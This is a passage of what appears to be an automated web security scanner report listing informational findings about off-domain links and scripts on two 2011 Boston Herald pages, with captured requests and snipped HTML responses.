...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

7.11. http://www.bostonherald.com/jobfind/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /jobfind/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /jobfind/?srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:03:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 60213

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
<!-- // jobfind/index.tmpl
...[SNIP]...
<![endif]-->

<link rel="alternate" title="Jobfind - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/jobfind/" type="application/rss+xml">

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
   <script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>

   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fjobfind%2F&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/jobfind/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://hotjobs.yahoo.com/jobseeker/jobsearch/my_searches.html?partner=bostonherald">My Searches</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://hotjobs.yahoo.com/jobseeker/jobsearch/saved_job_manager.html?partner=bostonherald">My Jobs</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://hotjobs.yahoo.com/jobseeker/myhj/resume-manager.html?partner=bostonherald">My Resumes</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://jobfind.salary.com/">What are you worth?</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<div class="hjConsoleHeader">
       <a target="hotjobs" href="http://hotjobs.yahoo.com" ylc="http://hotjobs.yahoo.com/;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">
           <img src="http://l.yimg.com/a/i/us/hj/gr2/monst_lo_nwsp_console_3.gif" alt="Search for jobs with Monster+HotJobs" style="border-width:0px;"/>
       </a>
...[SNIP]...
ize:11px;color:#000000;background:transparent url(http://l.yimg.com/a/i/us/hj/gr/yellow-buttons.gif) no-repeat scroll 0px 0px;height:22px;width:75px;cursor:pointer;float:right;margin-right:10px;">
               <a target="hotjobs" href="http://hotjobs.yahoo.com/jobs-search-advanced/" ylc="http://hotjobs.yahoo.com/jobs-search-advanced/;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald" style="font-size:85%;color:#004CCA;text-decoration:underline;">Advanced Search</a>
...[SNIP]...
<li><a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/jobseeker/login/login.html?.done=http%3A%2F%2Fhotjobs.yahoo.com%2Fjobseeker%2Fjobsearch%2Fmy_searches.html%3Fpartner%3Dbostonherald" ylc="http://hotjobs.yahoo.com/jobseeker/login/login.html;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?.done=http%3A%2F%2Fhotjobs.yahoo.com%2Fjobseeker%2Fjobsearch%2Fmy_searches.html%3Fpartner%3Dbostonherald&partner=bostonherald">Sign In</a>&nbsp;|&nbsp;<a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="https://us.lrd.yahoo.com/_ylc=X3oDMTFxZmRpYTFrBF9TAzM5NjUxMTI1MQRsaWQDcmVnaXN0ZXIEcGFydG5lcgNib3N0b25oZXJhbGQEc3JjA2NvbnNvbGU-/SIG=15hpku0jd/**https%3A//login.yahoo.com/config/eval_register%3F.last=http%253A%252F%252Fhotjobs.yahoo.com%252Fjobseeker%252Flogin%252Flogin.html%253Fpartner%253Dbostonherald%26.src=hotjobs">Register</a>
...[SNIP]...
</h1>
       <a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/resume" ylc="http://hotjobs.yahoo.com/resume;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">Resumes</a>&nbsp;|&nbsp;<a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/interview" ylc="http://hotjobs.yahoo.com/interview;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">Interviewing</a>&nbsp;|&nbsp;<a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/salary" ylc="http://hotjobs.yahoo.com/salary;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">Salary</a><br />
       <a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/networking" ylc="http://hotjobs.yahoo.com/networking;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">Networking</a>&nbsp;|&nbsp;<a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/diversity" ylc="http://hotjobs.yahoo.com/diversity;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">Diversity</a>
...[SNIP]...
<div class="hjConsoleContent hjConsoleContentRight">
       <a target="hotjobs" href="http://hotjobs.yahoo.com/create-resume" ylc="http://hotjobs.yahoo.com/create-resume;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">
           <img src="http://l.yimg.com/a/i/us/hj/post_resume.gif" alt="Post Your Resume Now" style="border-width:0px;margin-left:10px;"/>
       </a>
...[SNIP]...
<li><a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/jobs-c-Accounting_Finance-l-Boston-MA" ylc="http://hotjobs.yahoo.com/jobs-c-Accounting_Finance-l-Boston-MA;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">Accounting & Finance</a>
...[SNIP]...
<li><a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/jobs-c-Clerical_Administrative-l-Boston-MA" ylc="http://hotjobs.yahoo.com/jobs-c-Clerical_Administrative-l-Boston-MA;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">Clerical & Admin</a>
...[SNIP]...
<li><a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/jobs-c-Healthcare-l-Boston-MA" ylc="http://hotjobs.yahoo.com/jobs-c-Healthcare-l-Boston-MA;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">Healthcare</a>
...[SNIP]...
<li><a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/jobs-c-Retail-l-Boston-MA" ylc="http://hotjobs.yahoo.com/jobs-c-Retail-l-Boston-MA;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">Retail</a></li>
           <li><a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/jobs-c-Sales-l-Boston-MA" ylc="http://hotjobs.yahoo.com/jobs-c-Sales-l-Boston-MA;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">Sales</a></li>
           <li><a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/jobs-c-Technology-l-Boston-MA" ylc="http://hotjobs.yahoo.com/jobs-c-Technology-l-Boston-MA;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">Technology</a>
...[SNIP]...
<li><a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/jobs-search-category" ylc="http://hotjobs.yahoo.com/jobs-search-category;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">More Job Categories...</a>
...[SNIP]...
</span> <a href="http://hiring.hotjobs.yahoo.com/ss/php/hjss_partners.php?P=bostonherald&dest_page=CSB" style="color: rgb(0, 76, 202);">Search Resumes</a>
...[SNIP]...
</span> <a href="http://hiring.hotjobs.yahoo.com/ss/php/hjss_partners.php?showhiring=true&P=bostonherald" style="color: rgb(0, 76, 202);">Save with Starter Packs</a>
...[SNIP]...
<div style="padding-top: 5px;">HotJobs Customer? <a target="hotjobs" href="http://selfcare.hotjobs.yahoo.com/ss/php/hjss_partners.php?P=bostonherald" style="color: rgb(0, 76, 202); text-decoration: underline;">Sign In</a>
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="http://us.bc.yahoo.com/b?P=CO_vyULEenJcz9lH2_GkPAdIzIkMMk1DgrsADsRj&T=17ul1btni%2fX%3d1296270011%2fE%3d396511251%2fR%3dhojo%2fK%3d5%2fV%3d3.1%2fW%3dJ%2fY%3dYAHOO%2fF%3d2975542127%2fH%3dc2VydmVJZD0iQ09fdnlVTEVlbkpjejlsSDJfR2tQQWRJeklrTU1rMURncnNBRHNSaiIgc2l0ZUlkPSI0NDYxMDUxIiB0U3RtcD0iMTI5NjI3MDAxMTk3NDMwNyIg%2fQ%3d-1%2fS%3d1%2fJ%3d1F7AC442"></noscript>
...[SNIP]...
<div style="position: relative; top: -70px; left: 275px; text-align: center; background-color: white; width: 150px; border: 1px solid #666;"><a href="http://bostonherald.boocoo.com"><img src="http://cache.heraldinteractive.com/advertising/boocoo/boocoo.jpg" border="0" /></a></div>


            <a href="http://hotjobs.yahoo.com/jobseeker/jobsearch/search_results.html?partner=bostonherald&company_gid=597605&updated_since=anytime"><img src="http://cache.heraldinteractive.com/images/siteImages/viewHeraldJobsOnly.gif"></a>
...[SNIP]...
<div class="jobfindDivTop"><img src="http://cache.heraldinteractive.com/images/siteImages/teaseBoxes/jobfindNewsCorner.gif" alt="Jobfind News Corner" /></div>
...[SNIP]...
</a>
        <a href="http://feeds.feedburner.com/bostonherald/jobfind/news/"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/xml3.gif" alt="XML" /></a>
...[SNIP]...
</div>
                           <img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/20110128/stp/f8b94c_taco012811.jpg" alt="Photo" />
                       <span class="ArticleSummary">
...[SNIP]...
</div>
<img src="http://bh.heraldinteractive.com/images/siteImages/teaseBoxes/jobfindFeaturedEmployer.gif" alt="Jobfind Featured Employers" />
</div>
...[SNIP]...
<br />
+&nbsp;<a class="LinksDarkRedNone" href="http://bh.heraldinteractive.com/jobfind/resume_edge/">Build the perfect resume now!</a>
...[SNIP]...
<div class="jobfindDivTop">
<a href="http://jobfind.salary.com"><img src="http://bh.heraldinteractive.com/images/siteImages/teaseBoxes/jobfindWhatAreYouWorth.gif" alt="Jobfind Job Salary Wizard" /></a>
...[SNIP]...
<form name="newsearchform" method="get" action="http://jobfind.salary.com/salarywizard/layoutscripts/swzl_titleselect.asp" onsubmit="return gotoTitleSelect();"><script language="javascript" src="http://bostonherald.salary.com/salarywizard/utilityscripts/swzu_v4_jsfunc.js"></script>
...[SNIP]...
<li><a href="http://jobfind.salary.com"><img src="http://bh.heraldinteractive.com/images/siteImages/jobfind/salaryWizardLogo.gif" alt="Jobfind Job Salary Wizard"></a>
...[SNIP]...
<div id="jobfindSalaryDoubleDivLeft">
<img src="http://bh.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif" alt="Jobfind" />&nbsp;<a href="http://jobfind.salary.com/CostOfLivingWizard/layoutscripts/coll_start.asp">Cost of Living Wizard</a><br />
<img src="http://bh.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif" alt="Jobfind" />&nbsp;<a href="http://jobfind.salary.com/jobassessor/layoutscripts/joel_start.asp">Job Assessor</a><br />
<img src="http://bh.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif" alt="Jobfind" />&nbsp;<a href="http://jobfind.salary.com/collegetuitionplanner/layoutscripts/cltl_start.asp">College Tuition Planner</a>
...[SNIP]...
<div id="jobfindSalaryDoubleDivRight">
<img src="http://bh.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif" alt="Jobfind" />&nbsp;<a href="http://jobfind.salary.com/millionairemaker/layoutscripts/mlcl_start.asp">How long until you make a million?</a><br />
<img src="http://bh.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif" alt="Jobfind" />&nbsp;<a href="http://jobfind.salary.com/salarytimer/layoutscripts/stml_start.asp">Compare yourself to the power players</a><br />
<img src="http://bh.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif" alt="Jobfind" />&nbsp;<a href="http://jobfind.salary.com/execcomp/layoutscripts/excl_companysearch.asp">Executive Compensation Wizard</a>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

7.12. http://www.bostonherald.com/mediacenter/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /mediacenter/index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /mediacenter/index.php?media_type_photo=0&media_type_video=1&media_type_audio=0 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:57:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 339722

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Photos & Video - Boston
...[SNIP]...
<!-- Google hosts a compressed, cacheable version of Prototype -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>


                            <script src="http://cache.heraldinteractive.com/js/lightbox.js" type="text/javascript"></script>
                                <script src="http://cache.heraldinteractive.com/js/tooltips.js?fresh=283" type="text/javascript"></script>
...[SNIP]...
<![endif]-->


<link rel="alternate" title="Photos & Video - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/mediacenter/" type="application/rss+xml">

<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fmediacenter%2Findex.php%3Fmedia_type_photo%3D0%26media_type_video%3D1%26media_type_audio%3D0&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://buyheraldphotos.com">Buy Herald Photos</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
ideo" name="media_type_video" value="1" checked="checked" onclick=" if (this.checked == true) { updateData(this.name,1); } else { updateData(this.name,0); } " style="position:relative; top: 2px;" /><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniVideo.png" style="position:relative; top: 4px;" /> Video

&nbsp;

   <!--
<input type="submit" class="mediaTypeBtn " name="media_type" value="Audio" onclick="if($('media_type_audio').
...[SNIP]...
id="media_type_photo" name="media_type_photo" value="0" onclick=" if (this.checked == true) { updateData(this.name,1); } else { updateData(this.name,0); } " style="position:relative; top: 2px;" /><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPhoto.png" style="position:relative; top: 4px;" /> Photo

&nbsp;

</div>
...[SNIP]...
<div id="navPaneOverlay" ><img class="ajax_loader" src="http://cache.heraldinteractive.com/images/siteImages/icons/ajax-loader-big-blackBg.gif" /></div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay0" class="nowPlayingOverlay" width="40" style=" display: block; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay1" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay2" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay3" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay4" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay5" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay6" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay7" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay8" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay9" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay10" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay11" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay12" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay13" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay14" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay15" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay16" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay17" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay18" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay19" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

